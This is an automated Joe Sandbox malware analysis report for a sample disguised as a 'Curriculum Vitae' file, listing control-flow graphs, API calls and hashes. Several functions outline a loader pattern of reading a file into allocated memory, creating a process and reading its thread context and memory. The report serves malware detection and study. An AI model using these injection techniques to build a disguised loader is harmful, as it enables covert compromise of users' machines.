                      control_flow_graph 650 d33170-d33185 651 d33187-d3318a 650->651 652 d331e5-d331e7 650->652 654 d331eb 651->654 655 d3318c-d33193 651->655 652->651 653 d331e9 652->653 656 d331d0-d331d8 DefWindowProcW 653->656 657 d331f1-d331f6 654->657 658 d72dfb-d72e23 call d318e2 call d4e499 654->658 659 d33265-d3326d PostQuitMessage 655->659 660 d33199-d3319e 655->660 661 d331de-d331e4 656->661 663 d331f8-d331fb 657->663 664 d3321d-d33244 SetTimer RegisterWindowMessageW 657->664 693 d72e28-d72e2f 658->693 662 d33219-d3321b 659->662 666 d331a4-d331a8 660->666 667 d72e7c-d72e90 call d9bf30 660->667 662->661 668 d33201-d33214 KillTimer call d330f2 call d33c50 663->668 669 d72d9c-d72d9f 663->669 664->662 671 d33246-d33251 CreatePopupMenu 664->671 672 d331ae-d331b3 666->672 673 d72e68-d72e72 call d9c161 666->673 667->662 685 d72e96 667->685 668->662 676 d72dd7-d72df6 MoveWindow 669->676 677 d72da1-d72da5 669->677 671->662 681 d72e4d-d72e54 672->681 682 d331b9-d331be 672->682 690 d72e77 673->690 676->662 686 d72da7-d72daa 677->686 687 d72dc6-d72dd2 SetFocus 677->687 681->656 688 d72e5a-d72e63 call d90ad7 681->688 683 d33253-d33263 call d3326f 682->683 684 d331c4-d331ca 682->684 683->662 684->656 684->693 685->656 686->684 694 d72db0-d72dc1 call d318e2 686->694 687->662 688->656 690->662 693->656 698 d72e35-d72e48 call d330f2 call d33837 693->698 694->662 698->656
                      APIs
                      • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00D3316A,?,?), ref: 00D331D8
                      • KillTimer.USER32(?,00000001,?,?,?,?,?,00D3316A,?,?), ref: 00D33204
                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00D33227
                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00D3316A,?,?), ref: 00D33232
                      • CreatePopupMenu.USER32 ref: 00D33246
                      • PostQuitMessage.USER32(00000000), ref: 00D33267
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                      • String ID: TaskbarCreated
                      • API String ID: 129472671-2362178303
                      • Opcode ID: 3c729362326f06c62be7bb1db09f0b430e76b1a250a4d7f0f1455f1916e04de3
                      • Instruction ID: 0ad25c3102c35707eb900510544dad92a44e3afcd5931f27c5a6f27fc0076ef9
                      • Opcode Fuzzy Hash: 3c729362326f06c62be7bb1db09f0b430e76b1a250a4d7f0f1455f1916e04de3
                      • Instruction Fuzzy Hash: 73417A35610301AFDB141B789F0EB7E3A18E745340F085125F64AEA2E1DB76CE84D7B5
                      Function 00D3DFD0 Relevance: 15.4, APIs: 2, Strings: 6, Instructions: 1414COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID: D%$D%$D%$D%$D%$Variable must be of type 'Object'.
                      • API String ID: 0-2799515523
                      • Opcode ID: 82e4fc258dfda841acfe53d2ec248f905f06f1822d47eaea832281a33e8575d3
                      • Instruction ID: 70e187ffb3dc7eed4f0f3cd44cc4625a92b71fe93bbca6534cbfcf0f7e800dfe
                      • Opcode Fuzzy Hash: 82e4fc258dfda841acfe53d2ec248f905f06f1822d47eaea832281a33e8575d3
                      • Instruction Fuzzy Hash: 7EC26671A00215CFCB24DF98C885AADB7B1FB09710F288569E946AB3E1D375ED41CBB1
                      Function 00D68D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1216 d68d45-d68d55 1217 d68d57-d68d6a call d5f2c6 call d5f2d9 1216->1217 1218 d68d6f-d68d71 1216->1218 1232 d690f1 1217->1232 1220 d68d77-d68d7d 1218->1220 1221 d690d9-d690e6 call d5f2c6 call d5f2d9 1218->1221 1220->1221 1224 d68d83-d68dae 1220->1224 1238 d690ec call d627ec 1221->1238 1224->1221 1227 d68db4-d68dbd 1224->1227 1230 d68dd7-d68dd9 1227->1230 1231 d68dbf-d68dd2 call d5f2c6 call d5f2d9 1227->1231 1235 d690d5-d690d7 1230->1235 1236 d68ddf-d68de3 1230->1236 1231->1238 1237 d690f4-d690f9 1232->1237 1235->1237 1236->1235 1240 d68de9-d68ded 1236->1240 1238->1232 1240->1231 1241 d68def-d68e06 1240->1241 1244 d68e23-d68e2c 1241->1244 1245 d68e08-d68e0b 1241->1245 1249 d68e2e-d68e45 call d5f2c6 call d5f2d9 call d627ec 1244->1249 1250 d68e4a-d68e54 1244->1250 1247 d68e15-d68e1e 1245->1247 1248 d68e0d-d68e13 1245->1248 1251 d68ebf-d68ed9 1247->1251 1248->1247 1248->1249 1281 d6900c 1249->1281 1253 d68e56-d68e58 1250->1253 1254 d68e5b-d68e79 call d63820 call d629c8 * 2 1250->1254 1256 d68edf-d68eef 1251->1256 1257 d68fad-d68fb6 call d6f89b 1251->1257 1253->1254 1285 d68e96-d68ebc call d69424 1254->1285 1286 d68e7b-d68e91 call d5f2d9 call d5f2c6 1254->1286 1256->1257 1262 d68ef5-d68ef7 1256->1262 1270 d68fb8-d68fca 1257->1270 1271 d69029 1257->1271 1262->1257 1263 d68efd-d68f23 1262->1263 1263->1257 1267 d68f29-d68f3c 1263->1267 1267->1257 1272 d68f3e-d68f40 1267->1272 1270->1271 1276 d68fcc-d68fdb GetConsoleMode 1270->1276 1274 d6902d-d69045 ReadFile 1271->1274 1272->1257 1277 d68f42-d68f6d 1272->1277 1279 d69047-d6904d 1274->1279 1280 d690a1-d690ac GetLastError 1274->1280 1276->1271 1282 d68fdd-d68fe1 1276->1282 1277->1257 1284 d68f6f-d68f82 1277->1284 1279->1280 1289 d6904f 1279->1289 1287 d690c5-d690c8 1280->1287 1288 d690ae-d690c0 call d5f2d9 call d5f2c6 1280->1288 1283 d6900f-d69019 call d629c8 1281->1283 1282->1274 1290 d68fe3-d68ffd ReadConsoleW 1282->1290 1283->1237 1284->1257 1292 d68f84-d68f86 1284->1292 1285->1251 1286->1281 1299 d69005-d6900b call d5f2a3 1287->1299 1300 d690ce-d690d0 1287->1300 1288->1281 1296 d69052-d69064 1289->1296 1297 d6901e-d69027 1290->1297 1298 d68fff GetLastError 1290->1298 1292->1257 1303 d68f88-d68fa8 1292->1303 1296->1283 1307 d69066-d6906a 1296->1307 1297->1296 1298->1299 1299->1281 1300->1283 1303->1257 1311 d69083-d6908e 1307->1311 1312 d6906c-d6907c call d68a61 1307->1312 1313 d69090 call d68bb1 1311->1313 1314 d6909a-d6909f call d688a1 1311->1314 1321 d6907f-d69081 1312->1321 1322 d69095-d69098 1313->1322 1314->1322 1321->1283 1322->1321
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b851c8c34edf5859350e20679be43f921b340c7430023ef5ff396f3b87b4d2fb
                      • Instruction ID: ac30a4a96e9ca1807bf6a2f0fc0d735c2295c9003530cfc066e3cd5111851bdb
                      • Opcode Fuzzy Hash: b851c8c34edf5859350e20679be43f921b340c7430023ef5ff396f3b87b4d2fb
                      • Instruction Fuzzy Hash: 02C100B4A04349AFCF11DFA8D851BADBBB8AF49310F084199F955AB392CB318945DB70
                      Function 03BB25C0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1324 3bb25c0-3bb266e call 3bb0000 1327 3bb2675-3bb269b call 3bb34d0 CreateFileW 1324->1327 1330 3bb269d 1327->1330 1331 3bb26a2-3bb26b2 1327->1331 1332 3bb27ed-3bb27f1 1330->1332 1338 3bb26b9-3bb26d3 VirtualAlloc 1331->1338 1339 3bb26b4 1331->1339 1334 3bb2833-3bb2836 1332->1334 1335 3bb27f3-3bb27f7 1332->1335 1340 3bb2839-3bb2840 1334->1340 1336 3bb27f9-3bb27fc 1335->1336 1337 3bb2803-3bb2807 1335->1337 1336->1337 1341 3bb2809-3bb2813 1337->1341 1342 3bb2817-3bb281b 1337->1342 1343 3bb26da-3bb26f1 ReadFile 1338->1343 1344 3bb26d5 1338->1344 1339->1332 1345 3bb2842-3bb284d 1340->1345 1346 3bb2895-3bb28aa 1340->1346 1341->1342 1349 3bb282b 1342->1349 1350 3bb281d-3bb2827 1342->1350 1351 3bb26f8-3bb2738 VirtualAlloc 1343->1351 1352 3bb26f3 1343->1352 1344->1332 1353 3bb284f 1345->1353 1354 3bb2851-3bb285d 1345->1354 1347 3bb28ba-3bb28c2 1346->1347 1348 3bb28ac-3bb28b7 VirtualFree 1346->1348 1348->1347 1349->1334 1350->1349 1355 3bb273a 1351->1355 1356 3bb273f-3bb275a call 3bb3720 1351->1356 1352->1332 1353->1346 1357 3bb285f-3bb286f 1354->1357 1358 3bb2871-3bb287d 1354->1358 1355->1332 1364 3bb2765-3bb276f 1356->1364 1359 3bb2893 1357->1359 1360 3bb288a-3bb2890 1358->1360 1361 3bb287f-3bb2888 1358->1361 1359->1340 1360->1359 1361->1359 1365 3bb27a2-3bb27b6 call 3bb3530 1364->1365 1366 3bb2771-3bb27a0 call 3bb3720 1364->1366 1372 3bb27ba-3bb27be 1365->1372 1373 3bb27b8 1365->1373 1366->1364 1374 3bb27ca-3bb27ce 1372->1374 1375 3bb27c0-3bb27c4 FindCloseChangeNotification 1372->1375 1373->1332 1376 3bb27de-3bb27e7 1374->1376 1377 3bb27d0-3bb27db VirtualFree 1374->1377 1375->1374 1376->1327 1376->1332 1377->1376
                      APIs
                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 03BB2691
                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 03BB28B7
                      Memory Dump Source
                      • Source File: 00000000.00000002.2111540426.0000000003BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3bb0000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateFileFreeVirtual
                      • String ID:
                      • API String ID: 204039940-0
                      • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                      • Instruction ID: 6c939b5900b86af61d5923b707b7bea61a93e4dc198b3471fb1d484693219384
                      • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                      • Instruction Fuzzy Hash: ABA10874E00209EBDB14CFA4C894BFEB7B5FF48308F1485A9E515BB280DBB59A41CB95
                      Function 00D32C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1388 d32c63-d32cd3 CreateWindowExW * 2 ShowWindow * 2
                      APIs
                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00D32C91
                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00D32CB2
                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D31CAD,?), ref: 00D32CC6
                      • ShowWindow.USER32(00000000,?,?,?,?,?,?,00D31CAD,?), ref: 00D32CCF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$CreateShow
                      • String ID: AutoIt v3$edit
                      • API String ID: 1584632944-3779509399
                      • Opcode ID: 2c610cca729f0e43f4dc20ff319e8c4bf4cdfe47026ae0cdf3f1c6d9ddd14c22
                      • Instruction ID: 8f7cd0c073b18bdd20fb69b8ad927e6598789c3b49364d7e65dd1a30fcc13b7a
                      • Opcode Fuzzy Hash: 2c610cca729f0e43f4dc20ff319e8c4bf4cdfe47026ae0cdf3f1c6d9ddd14c22
                      • Instruction Fuzzy Hash: A3F017755503917EEB210713AC08F7B2EBDD7C6F50B02109EFA04AB2A0C67A0888DAB0
                      Function 03BB23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1503 3bb23b0-3bb24bc call 3bb0000 call 3bb22a0 CreateFileW 1510 3bb24be 1503->1510 1511 3bb24c3-3bb24d3 1503->1511 1512 3bb2573-3bb2578 1510->1512 1514 3bb24da-3bb24f4 VirtualAlloc 1511->1514 1515 3bb24d5 1511->1515 1516 3bb24f8-3bb250f ReadFile 1514->1516 1517 3bb24f6 1514->1517 1515->1512 1518 3bb2513-3bb254d call 3bb22e0 call 3bb12a0 1516->1518 1519 3bb2511 1516->1519 1517->1512 1524 3bb2569-3bb2571 ExitProcess 1518->1524 1525 3bb254f-3bb2564 call 3bb2330 1518->1525 1519->1512 1524->1512 1525->1524
                      APIs
                        • Part of subcall function 03BB22A0: Sleep.KERNELBASE(000001F4), ref: 03BB22B1
                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 03BB24B2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2111540426.0000000003BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3bb0000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateFileSleep
                      • String ID: 9BSP60ZTBMBFRBH
                      • API String ID: 2694422964-4072201684
                      • Opcode ID: 832895546e6ba0d144f226aaaab2fecb49410c677f65140a3353a12e622cc59b
                      • Instruction ID: 7d1f4deb6b7504b324d20a7808de3b480d65fb16995e54372efa88d3687adfc7
                      • Opcode Fuzzy Hash: 832895546e6ba0d144f226aaaab2fecb49410c677f65140a3353a12e622cc59b
                      • Instruction Fuzzy Hash: 49517471D14259EAEF11DBA4C814BEFBB74AF44304F0045A9E608BB2C0DBB91B45CBA5
                      Function 00DA2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1527 da2947-da29b9 call d71f50 call da25d6 call d4fe0b call d35722 call da274e call d3511f call d55232 1542 da29bf-da29c6 call da2e66 1527->1542 1543 da2a6c-da2a73 call da2e66 1527->1543 1548 da29cc-da2a6a call d5d583 call d54983 call d59038 call d5d583 call d59038 * 2 1542->1548 1549 da2a75-da2a77 1542->1549 1543->1549 1550 da2a7c 1543->1550 1553 da2a7f-da2b3a call d350f5 * 8 call da3017 call d5e5eb 1548->1553 1552 da2cb6-da2cb7 1549->1552 1550->1553 1554 da2cd5-da2cdb 1552->1554 1592 da2b3c-da2b3e 1553->1592 1593 da2b43-da2b5e call da2792 1553->1593 1557 da2cdd-da2ced call d4fdcd call d4fe14 1554->1557 1558 da2cf0-da2cf6 1554->1558 1557->1558 1592->1552 1596 da2bf0-da2bfc call d5e678 1593->1596 1597 da2b64-da2b6c 1593->1597 1604 da2bfe-da2c0d DeleteFileW 1596->1604 1605 da2c12-da2c16 1596->1605 1598 da2b6e-da2b72 1597->1598 1599 da2b74 1597->1599 1601 da2b79-da2b97 call d350f5 1598->1601 1599->1601 1611 da2b99-da2b9e 1601->1611 1612 da2bc1-da2bd7 call da211d call d5dbb3 1601->1612 1604->1552 1607 da2c18-da2c7e call da25d6 call d5d2eb * 2 call da22ce 1605->1607 1608 da2c91-da2ca5 CopyFileW 1605->1608 1609 da2cb9-da2ccf DeleteFileW call da2fd8 1607->1609 1632 da2c80-da2c8f DeleteFileW 1607->1632 1608->1609 1610 da2ca7-da2cb4 DeleteFileW 1608->1610 1618 da2cd4 1609->1618 1610->1552 1615 da2ba1-da2bb4 call da28d2 1611->1615 1625 da2bdc-da2be7 1612->1625 1626 da2bb6-da2bbf 1615->1626 1618->1554 1625->1597 1628 da2bed 1625->1628 1626->1612 1628->1596 1632->1552
                      APIs
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA2C05
                      • DeleteFileW.KERNEL32(?), ref: 00DA2C87
                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DA2C9D
                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA2CAE
                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DA2CC0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: File$Delete$Copy
                      • String ID:
                      • API String ID: 3226157194-0
                      • Opcode ID: aa5fb5887d9fc5ccf5cec0bc9994265d027d1db3e48dbe5640f68fb0622dfe2a
                      • Instruction ID: 473cbb4e95a1fb17f517b83ec105d92b6c3ecb229fe5561b127d8e12be4f46f4
                      • Opcode Fuzzy Hash: aa5fb5887d9fc5ccf5cec0bc9994265d027d1db3e48dbe5640f68fb0622dfe2a
                      • Instruction Fuzzy Hash: 1DB17D72D00119ABDF25DBA9CC85EEEB7BDEF09350F1040A6FA09E6145EB309A448F71
                      Function 00D33B1C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                      Download Yara Rule

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      control_flow_graph 1943 d33b1c-d33b27 1944 d33b99-d33b9b 1943->1944 1945 d33b29-d33b2e 1943->1945 1947 d33b8c-d33b8f 1944->1947 1945->1944 1946 d33b30-d33b48 RegOpenKeyExW 1945->1946 1946->1944 1948 d33b4a-d33b69 RegQueryValueExW 1946->1948 1949 d33b80-d33b8b RegCloseKey 1948->1949 1950 d33b6b-d33b76 1948->1950 1949->1947 1951 d33b90-d33b97 1950->1951 1952 d33b78-d33b7a 1950->1952 1953 d33b7e 1951->1953 1952->1953 1953->1949
                      APIs
                      • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00D33B0F,SwapMouseButtons,00000004,?), ref: 00D33B40
                      • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00D33B0F,SwapMouseButtons,00000004,?), ref: 00D33B61
                      • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00D33B0F,SwapMouseButtons,00000004,?), ref: 00D33B83
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CloseOpenQueryValue
                      • String ID: Control Panel\Mouse
                      • API String ID: 3677997916-824357125
                      • Opcode ID: e6de1401d4d6e0a2b0dc129e23e9bb0a2318e83df090a98d20ec79ad3aa4e44b
                      • Instruction ID: 77522f4a5b92e1ed293ef2dc028b1dfce8c13836f9b209860bfbe9f4cecab629
                      • Opcode Fuzzy Hash: e6de1401d4d6e0a2b0dc129e23e9bb0a2318e83df090a98d20ec79ad3aa4e44b
                      • Instruction Fuzzy Hash: 86112AB5520209FFDB218FA5DD44EAEB7B8EF04744F144459E905D7210D2319E40A770
                      Function 03BB12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                      Download Yara Rule
                      APIs
                      • CreateProcessW.KERNELBASE(?,00000000), ref: 03BB1A5B
                      • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03BB1AF1
                      • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03BB1B13
                      Memory Dump Source
                      • Source File: 00000000.00000002.2111540426.0000000003BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BB0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3bb0000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process$ContextCreateMemoryReadThreadWow64
                      • String ID:
                      • API String ID: 2438371351-0
                      • Opcode ID: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                      • Instruction ID: d028bfe9cf7708bbd788475925b842bbd137ebe6fe89dfa4ca828d1b7ef83291
                      • Opcode Fuzzy Hash: 4a62210935fbc19ac52c28b7856ac9112c9a9e608a38d15f0a7da1a89c903d0f
                      • Instruction Fuzzy Hash: 55621F34A14258DBEB24CFA4C850BEEB375EF58304F1091A9D10DEB394EBB59E81CB59
                      Function 00D33923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                      Download Yara Rule
                      APIs
                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00D733A2
                        • Part of subcall function 00D36B57: _wcslen.LIBCMT ref: 00D36B6A
                      • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00D33A04
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: IconLoadNotifyShell_String_wcslen
                      • String ID: Line:
                      • API String ID: 2289894680-1585850449
                      • Opcode ID: a65d6a0671a194b1776ff113f7eb9bc6cab249486a2c9996b88d226112ab92ef
                      • Instruction ID: da7c96131eb2d5ca12374ebc1ec7af568cf4c79e62e14d6353e9bbd6deb53f64
                      • Opcode Fuzzy Hash: a65d6a0671a194b1776ff113f7eb9bc6cab249486a2c9996b88d226112ab92ef
                      • Instruction Fuzzy Hash: 4831D271408301AEC725EB24DC45BEBB7D8EF40710F04856EF59997191EB749A88CBF2
                      Function 00D4FDDB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                      Download Yara Rule
                      APIs
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00D50668
                        • Part of subcall function 00D532A4: RaiseException.KERNEL32(?,?,?,00D5068A,?,00E01444,?,?,?,?,?,?,00D5068A,00D31129,00DF8738,00D31129), ref: 00D53304
                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00D50685
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Exception@8Throw$ExceptionRaise
                      • String ID: Unknown exception
                      • API String ID: 3476068407-410509341
                      • Opcode ID: 09800a0ff3189a3d41f7fc5bf2e5be6dd135ec819c28ac18ce936fd9ea671902
                      • Instruction ID: 2a7628907467f73474564392a08a2ed172755010f0067722658beba8eb1f99ee
                      • Opcode Fuzzy Hash: 09800a0ff3189a3d41f7fc5bf2e5be6dd135ec819c28ac18ce936fd9ea671902
                      • Instruction Fuzzy Hash: 0BF0C23490070D77CF00BBA4D846D9E7B6C9E00351B644531BD24D65A1FF71DA6DC5B1
                      Function 00DA3017 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                      Download Yara Rule
                      APIs
                      • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00DA302F
                      • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00DA3044
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmpDownload File
